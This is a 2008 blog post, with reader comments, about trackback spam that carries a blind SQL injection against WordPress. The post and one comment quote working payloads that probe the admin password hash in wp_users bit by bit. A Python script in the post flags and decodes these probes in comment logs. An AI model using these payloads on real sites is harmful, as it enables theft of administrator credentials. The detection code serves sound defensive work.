WP Plugins and Widgets For Wordpress 2.1+

Attack of the Wordpress-Hacking Spam Trackbacks

June 7th, 2008 by Elliott Back

So this is a cute comment I got, a trackback spam that’s also a SQL injection exploit for Wordpress. Check it out:

Website: ' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and substring(reverse(lpad(conv(substring(user_pass,8,1), 16, 2),4,'0')),4,1)='1' /* (IP: 124.217.250.190 , svservers.com)

URI: http://None

Excerpt: None…

It appears to be a known-cryptotext or weak-hash exploit against Wordpress looking for an admin password with an obvious signature. Cute.
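To triage records like the one above, here is an added example (not code from this post or from WordPress) that flags trackback fields carrying this signature and decodes which character of user_pass and which bit of its 4-bit value each probe compares. The sample records and the MD5 test hash (MD5 of the string "password") are constructed test values.

```python
import re

# Constructed sample trackback "Website" fields (not real log data), modelled on
# the two payloads quoted on this page, plus one benign URL.
SAMPLE_TRACKBACKS = [
    "' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and "
    "substring(reverse(lpad(conv(substring(user_pass,8,1), 16, 2),4,'0')),4,1)='1' /*",
    "' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and "
    "substring(reverse(lpad(conv(substring(user_pass,1,1), 16, 2),4,'0')),1,1)='1' /*",
    "http://example.invalid/2008/06/a-normal-trackback/",
]

# Matches the bit-probe expression: which character of user_pass is read, which
# position of the reversed 4-bit string is compared, and against which bit value.
PROBE_RE = re.compile(
    r"substring\(reverse\(lpad\(conv\(substring\(user_pass,\s*(\d+),\s*1\),\s*16,\s*2\),"
    r"\s*4,\s*'0'\)\),\s*(\d+),\s*1\)\s*=\s*'([01])'",
    re.IGNORECASE,
)

# Broader signature for flagging: a quote/paren break followed by UNION SELECT,
# a reference to wp_users, or a trailing comment marker that swallows the query.
SQLI_RE = re.compile(r"'\s*AND\s+1=0\)\s*UNION\s+SELECT|wp_users|/\*\s*$", re.IGNORECASE)


def decode_probe(field):
    """Return (hash_char_pos, bit_from_lsb, expected_bit), or None if not a probe."""
    m = PROBE_RE.search(field)
    if not m:
        return None
    char_pos, rev_pos, bit = (int(g) for g in m.groups())
    # lpad(...,4,'0') yields the nibble MSB-first; reverse() puts the LSB at
    # position 1, so reversed position N is bit N-1 counting from the LSB.
    return char_pos, rev_pos - 1, bit


def probe_bit(user_pass, char_pos, rev_pos):
    """Emulate the MySQL expression on a known hash string (1-based positions)."""
    nibble = int(user_pass[char_pos - 1], 16)  # substring(user_pass,N,1) + conv(...,16,2)
    padded = format(nibble, "04b")             # lpad(...,4,'0')
    return padded[::-1][rev_pos - 1]           # reverse(...) then substring(...,M,1)


def scan_trackbacks(records):
    """Flag injection attempts and decode which hash bit each one tests."""
    findings = []
    for rec in records:
        if SQLI_RE.search(rec):
            findings.append({"field": rec, "probe": decode_probe(rec)})
    return findings


if __name__ == "__main__":
    for f in scan_trackbacks(SAMPLE_TRACKBACKS):
        print(f["probe"], "<-", f["field"][:60])
```

Each flagged record tells you one hash position and one bit the sender was testing, so a run of such trackbacks in the comment log shows how far an extraction attempt progressed.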

Posted in Spam

10 Responses to “Attack of the Wordpress-Hacking Spam Trackbacks”

  1. Effe58@gmail.com says:

    I'm managing my friend's blog, and I found this just a few moments ago. I'm currently logged in as admin. Is there anything to worry about, or is this just another failed SQL injection?

  2. Jason says:

    Thanks Sebastian. http://codex.wordpress.org/Users_Authors_and_Users_SubPanel is the official writeup of what you suggest.

    @Cody – probably a separate username / password setup in the control panel. Look under protected directories, depending on what CP you use.

    @Hot gadgets: changing the default user name from admin to something else means that the attackers have to look for both a user name and a password, which increases the complexity.

    If they already know there is a user called admin then part of their problem is solved.

  3. azrin says:

    Actually, someone found a fraudulent backlink code which disables comments from any IP in the list of hosting providers.

    Meaning… if IP=(LIST)&REQUEST_URI=WP-COMMENT.PHP, then it is redirected to another page automatically. Mainly, renaming your wp-comment.php normally solves this issue (except multi-blogs).

    azrin @ http://www.chat.nu

  4. Hot gadgets says:

    How does changing admins solve the problem?

  5. Cody says:

    All of a sudden my WordPress blog is showing a “Restricted Access” popup window asking all visitors to my site to provide a username and password.

    Does anyone know if this is some sort of spam attack?

    If so, can anyone tell me where to look in my admin panel to fix this?

    I posted this question over at the WordPress forum but got no responses and the info I’ve seen in the WordPress troubleshooting forum didn’t clear up my question.

    Thanks in advance!

  6. Freelocale says:

    People should be sharing more free things like this. It's what keeps the Internet buzzin'.

  7. Sara says:

    Spammers are so frustrating. Isn't there some way to get rid of them?

  8. You must change your admin username to secure your blog.

    1. Create a new user and give him admin rights.
    2. Log out and log in with the new user account, then delete the old admin account. But attention: when deleting the old account it asks you to move your posts to the new account. Check yes!

    Sebastian
    Knowtebook

  9. artcoder says:

    So is this a WP security hole in 2.5.1 of Wordpress? Or has the hole been plugged up by now?

    Can I prevent that SQL injection by disabling trackbacks?

  10. pamQ says:

    I’m managing my friend’s blog, and I found this just a few moments ago. I’m currently logged in as admin. Is there anything to worry about, or is this just another failed SQL injection?

    This is what I got:

    ' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and substring(reverse(lpad(conv(substring(user_pass,1,1), 16, 2),4,'0')),1,1)='1' /* | None | IP: 124.217.227.127

    None…

    None…

    Thanks!
